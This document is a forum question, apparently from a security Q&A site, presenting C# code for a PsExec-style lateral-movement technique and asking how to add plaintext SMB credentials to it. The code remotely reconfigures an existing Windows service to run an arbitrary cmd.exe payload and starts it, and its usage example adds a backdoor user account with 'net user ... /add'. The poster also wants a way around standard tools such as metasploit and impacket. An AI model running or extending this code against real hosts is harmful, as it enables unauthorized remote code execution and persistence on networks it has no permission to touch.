# Custom PsExec csharp code with plaintext credentials

Tags: windows, .net, exploit-development, smb, ntlm

I have this code for exploiting PsExec that works perfectly fine when I have a TGS for the CIFS SPN on the target, however there are situations where I only have plaintext credentials for the local admin of the target, and so I cannot request a TGS for that user(since it is not a domain user).
So my question is how can I integrate smb authentication using username + password supplied as a command-line argument in this csharp script:

```
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace lat
{
    class Program
    {
        [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)]
        public static extern IntPtr OpenSCManager(string machineName, string databaseName, uint dwAccess);

        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess);

        [DllImport("advapi32.dll", EntryPoint = "ChangeServiceConfig")]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool ChangeServiceConfigA(IntPtr hService, uint dwServiceType, int dwStartType, int dwErrorControl, string lpBinaryPathName, string lpLoadOrderGroup, string lpdwTagId, string lpDependencies, string lpServiceStartName, string lpPassword, string lpDisplayName);

        [DllImport("advapi32", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool StartService(IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors);
        static void Main(string[] args)
        {
            if (args.Length == 0)
            {
                Console.WriteLine("[!] Usage: .\\lat.exe target payload");
                Console.WriteLine("[!] Example: .\\lat.exe file02 \"net user ankylo Ankylo33_$! /add /y\"");
                return;
            }

            String target = args[0];
            Console.WriteLine("[+] The target is: " + args[0]);
            IntPtr SCMHandle = OpenSCManager(target, null, 0xF003F);
            string ServiceName = "SensorService";
            IntPtr schService = OpenService(SCMHandle, ServiceName, 0xF01FF);
            string payload = "C:\\Windows\\System32\\cmd.exe /c " + args[1];
            Console.WriteLine("[+] The payload is: " + payload);
            bool bResult = ChangeServiceConfigA(schService, 0xffffffff, 3, 0, payload, null, null,
            null, null, null, null);
            bResult = StartService(schService, 0, null);
        }
    }
}
```

I also know that I can exploit it using metasploit/impacket/sysinternals, however, imagine that you are on a situation were you cannot use them.